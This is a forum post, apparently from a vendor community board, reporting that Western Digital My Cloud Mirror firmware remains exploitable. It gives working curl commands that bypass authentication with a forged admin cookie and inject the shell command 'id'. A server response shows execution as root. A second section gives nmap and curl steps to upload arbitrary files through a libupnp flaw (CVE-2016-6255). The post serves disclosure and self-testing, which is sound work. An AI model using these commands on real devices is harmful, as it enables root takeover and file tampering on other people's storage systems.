Latest firmware still vulnerable

My Cloud OS 3 Personal & Network Attached Storage My Cloud
333

FWIW the latest firmware update for the MyCloud Mirror 1st Gen currently says:

Resolved critical security vulnerabilities that potentially allowed unauthorized file deletion, unauthorized command execution and authentication bypass.

New Release - My Cloud Mirror Firmware Release 2.12.127 (01/08/2019)

However there is still at least one vulnerability described in:

https://www.exploitee.rs/index.php/Western_Digital_MyCloud#network_mgr.cgi_.28added_8.2F6.2F2017.29

which exists in / affects the newest 2.11.168 firmware of the MyCloud Mirror 1st Gen. Maybe other Models / Generations are affected as well, you can easily test this on your own with a Linux based system and two simple curl calls showing the authentication bypass:

curl -i "http://IP/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1"
curl -i "http://IP/web/dsdk/DsdkProxy.php" --data "';id;'" --cookie "isAdmin=1;username=admin"

Just replace the admin in “username=admin” with a valid user and you’re getting the following response:

HTTP/1.1 200 OK
Date: Thu, 30 Nov 2017 12:39:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: application/json
Content-Language: en

<br />
<b>Warning</b>:  http_response_code() expects parameter 1 to be long, string given in <b>/usr/local/modules/web/pages/dsdk/DsdkProxy.php</b> on line <b>48</b><br />
uid=0(root) gid=0(root) groups=0(root)
sh: : Permission denied

which means that you’re again able to run arbitrary commands on the system as root.

Edit

At least the WD MyCloud Mirror 1st Generation with the latest firmware 2.11.168 (11/28/17) is vulnerable to the CVE-2016-6255 in libupnp listed here as well:

https://nvd.nist.gov/vuln/detail/CVE-2016-6255

This can be simple checked with the following steps to upload a file to the target device:

  1. Scan for the UPnP TCP port of the device:

nmap -p 49000-49999 IP

  1. Verify that the file doesn’t exist yet:

curl -i http://IP:49154/test123

(Use the previously found port)

  1. Upload a new file:

curl -i --data "uploadtest" http://IP:49154/test123

  1. Verify that the file exists:

curl -i http://IP:49154/test123